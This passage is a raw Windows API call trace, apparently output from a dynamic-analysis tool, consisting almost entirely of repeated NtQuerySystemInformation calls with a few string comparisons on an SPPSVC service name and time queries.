[0284.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce88, Length=0x50, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0284.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0284.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x20, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x28, ResultLength=0x0) [0284.387] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0284.388] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d100 | out: lpSystemTimeAsFileTime=0xa78207d100*(dwLowDateTime=0x36dbd4e6, dwHighDateTime=0x1d6666a)) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0f0, Length=0x28, ResultLength=0x0) [0284.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0284.401] GetTickCount () returned 0x118727e [0284.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.406] NtQuerySystemInformation 